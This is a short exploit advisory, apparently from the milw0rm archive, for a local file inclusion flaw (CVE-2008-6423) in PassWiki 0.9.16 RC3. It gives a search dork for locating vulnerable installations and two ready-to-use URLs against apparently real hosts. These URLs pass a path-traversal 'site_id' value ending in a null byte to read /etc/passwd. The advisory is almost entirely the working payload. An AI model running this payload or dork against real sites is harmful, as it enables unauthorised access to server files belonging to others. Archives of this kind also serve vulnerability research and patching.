PassWiki 0.9.16 RC3 - 'site_id' Local File Inclusion

Related Vulnerabilities: CVE-2008-6423  
Publish Date: 31 May 2008
Author: mozi
                							

                dork: "powered by PassWiki"
example:
http://w3.funsrv.com/~konjo/passwiki/passwiki.php?site_id=../../../../../../../../../../../../../etc/passwd%00
http://inajob.no-ip.org/passwiki/passwiki.php?site_id=../../../../../../../../../../../../../etc/passwd%00


author:mozi2weed@yahoo.com
http://rstzone.org

# milw0rm.com [2008-05-31]